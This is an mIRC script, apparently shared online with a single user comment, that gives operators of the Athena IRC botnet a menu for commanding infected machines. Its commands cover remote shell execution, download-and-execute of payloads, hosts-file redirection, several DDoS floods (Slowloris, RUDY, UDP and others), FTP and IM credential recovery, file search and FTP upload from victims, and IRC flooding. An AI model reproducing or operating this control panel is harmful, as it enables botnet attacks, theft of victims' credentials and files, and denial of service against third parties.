Used by Athena customers for controling the bot via IRC
;Athena mIRC Script menu channel { - Athena .- .Misc ..Version:/msg $active !version ..Info:/msg $active !info ..Shell:{ %AthenaVar = $$?="Command:" msg $active !shell %AthenaVar } ..- ..Block Host:{ %AthenaVar = $$?="Host:" msg $active !http.block %AthenaVar } ..Redirect Host:{ %AthenaVar1 = $$?="Original Host:" %AthenaVar2 = $$?="Redirect to Host:" msg $active !http.redirect %AthenaVar1 %AthenaVar2 } ..Restore HOSTS File:/msg $active !hosts.restore ..- ..Download and Execute:{ %AthenaVar1 = $$?="URL to Executable File:" %AthenaVar2 = $$?="Range of Seconds:" msg $active !download %AthenaVar1 %AthenaVar2 } ..Download and Execute(Arguments):{ %AthenaVar1 = $$?="URL to Executable File:" %AthenaVar2 = $$?="Range of Seconds:" %AthenaVar3 = $$?="Arguments:" msg $active !download.arguments %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..Update:{ %AthenaVar1 = $$?="URL to Executable File:" %AthenaVar2 = $$?="Range of Seconds:" msg $active !download.update %AthenaVar1 %AthenaVar2 } ..Abort Download/Update:{ %AthenaVar = $$?="URL to Executable File:" msg $active !download.abort %AthenaVar } ..- ..Botkill ON:/msg $active !botkill.start ..Botkill OFF:/msg $active !botkill.stop ..Botkill Stats:/msg $active !botkill.stats ..Clear Botkill Stats:/msg $active !botkill.clear ..- ..Uninstall:/msg $active !uninstall .IRC Commands ..Join:{ %AthenaVar = $$?="Channel(and optional channel key):" msg $active !irc.join %AthenaVar } ..Part:{ %AthenaVar = $$?="Channel:" msg $active !irc.part %AthenaVar } ..Raw Command:{ %AthenaVar = $$?="Command:" msg $active !irc.raw %AthenaVar } ..Reconnect:/msg $active !irc.reconnect ..- ..Silent ON:/msg $active !irc.silent on ..Silent OFF:/msg $active !irc.silent off ..- ..Sort by Country:/msg $active ! ..Sort by Privelages:/msg $active !irc.sort.privelages ..Sort by Gender:/msg $active !irc.sort.gender ..Sort by OS:/msg $active !irc.sort.os ..Sort by Architecture:/msg $active !irc.sort.architecture ..Sort by .NET Framework:/msg $active !irc.sort.dotnet ..Sort by bot version:/msg $active !irc.sort.version ..- ..Unsort:/msg $active !irc.unsort .DDoS ..Stop Existing HTTP or LAYER4 Flood:/msg $active !ddos.stop ..- ..Slowloris:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.http.slowloris %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..Rapid GET:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.http.rapidget %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..RUDY:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.http.rudy %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..Rapid POST:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.http.rapidpost %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..Slow POST:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.http.slowpost %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..ARME:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.http.arme %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..Bandwith Drain:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Length(seconds):" msg $active !ddos.http.bandwith %AthenaVar1 %AthenaVar2 } ..- ..UDP:{ %AthenaVar1 = $$?="Hostname/IP:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.layer4.udp %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..ECF:{ %AthenaVar1 = $$?="Hostname/IP:" %AthenaVar2 = $$?="Port:" %AthenaVar3 = $$?="Length(seconds):" msg $active !ddos.layer4.ecf %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..- ..Browser Based Flood:{ %AthenaVar1 = $$?="Hostname/IP:" %AthenaVar2 = $$?="Length(seconds):" msg $active !ddos.browser %AthenaVar1 %AthenaVar2 } ..Stop Browser Based Flood:/msg $active !ddos.browser.stop ..- ..Organize Bots ...Join ....Free Bots:{ %AthenaVar = $$?="Channel(Optional Channel Key):" msg $active ! %AthenaVar } ....Busy Bots:{ %AthenaVar = $$?="Channel(Optional Channel Key):" msg $active !war.join.busy %AthenaVar } ...Part ....Free Bots:{ %AthenaVar = $$?="Channel(Optional PART Message):" msg $active ! %AthenaVar } ....Busy Bots:{ %AthenaVar = $$?="Channel(Optional PART Message):" msg $active !war.part.busy %AthenaVar } ..Check Website Status:{ %AthenaVar = $$?="Website URL:" msg $active !http.status %AthenaVar } .Recovery ..FTP:/msg $active !recovery.ftp ..IM:/msg $active ! .Files ..Stop File Search:/msg $active !filesearch.stop ..- ..File Search:{ %AthenaVar = $$?="Parameter:" msg $active !filesearch %AthenaVar } ..File Search(Output):{ %AthenaVar = $$?="Parameter:" msg $active !filesearch.output %AthenaVar } ..- ..FTP Upload:{ %AthenaVar1 = $$?="Hostname/IP:" %AthenaVar2 = $$?="User:" %AthenaVar3 = $$?="Pass:" %AthenaVar4 = $$?="File Path:" msg $active !ftp.upload %AthenaVar1 %AthenaVar2 %AthenaVar3 %AthenaVar4 } ..- .Website Views ..View Visible:{ %AthenaVar = $$?="Website URL:" msg $active !view %AthenaVar } ..View Hidden:{ %AthenaVar = $$?="Website URL:" msg $active !view.hidden %AthenaVar } ..- ..Add to View Queue:{ %AthenaVar1 = $$?="Website URL:" %AthenaVar2 = $$?="Range of seconds before visit:" %AthenaVar3 = $$?="Range of seconds during/after visit:" msg $active !smartview.add %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..Delete from View Queue:{ %AthenaVar = $$?="Website URL:" msg $active !smartview.del %AthenaVar } ..Clear View Queue:/msg $active !smartview.clear .IRC War ..Connect:{ %AthenaVar1 = $$?="IRC DNS:" %AthenaVar2 = $$?="IRC Port:" %AthenaVar3 = $$?="# of Connections to attempt(15 is Max):" msg $active !war.connect %AthenaVar1 %AthenaVar2 %AthenaVar3 } ..Disconnect:/msg $active !war.disconnect ..Status:/msg $active !war.status ..- ..RAW Command:{ %AthenaVar = $$?="RAW Command:" msg $active !war.raw %AthenaVar } ..Join Channel:{ %AthenaVar = $$?="Channel(Optional Channel Key):" msg $active !war.join %AthenaVar } ..Part Channel:{ %AthenaVar = $$?="Channel(Optional PART Message):" msg $active !war.part %AthenaVar } ..Message User/Channel:{ %AthenaVar1 = $$?="User/Channel:" %AthenaVar2 = $$?="Message:" msg $active !war.msg %AthenaVar1 %AthenaVar2 } ..Notice User/Channel:{ %AthenaVar1 = $$?="User/Channel:" %AthenaVar2 = $$?="Notice:" msg $active !war.notice %AthenaVar1 %AthenaVar2 } ..New Nickname:/msg $active !war.newnick ..- ..Invite User:{ %AthenaVar = $$?="User:" msg $active !war.invite %AthenaVar } ..CTCP Request:{ %AthenaVar = $$?="User:" msg $active !war.ctcp %AthenaVar } ..DCC Request:{ %AthenaVar = $$?="User:" msg $active !war.dcc %AthenaVar } ..- ..Kill User:{ %AthenaVar = $$?="User:" msg $active !war.kill.user %AthenaVar } ..Kill User[Multi]:{ %AthenaVar = $$?="List of Users(Separated by Spaces):" msg $active !war.kill.user.multi %AthenaVar } ..Channel Flood:{ %AthenaVar = $$?="Channel(Optional Channel Key):" msg $active ! %AthenaVar } ..Channel Flood[Join/Part]:{ %AthenaVar = $$?="Channel(Optional Channel Key):" msg $active ! %AthenaVar } ..Anope Flood:/msg $active !war.flood.anope ..Stop Flood or Kill:/msg $active !war.stop
Anonymous - April 16, 2013 at 1:34 am
This isn't the latest script. It's missing a recently added command.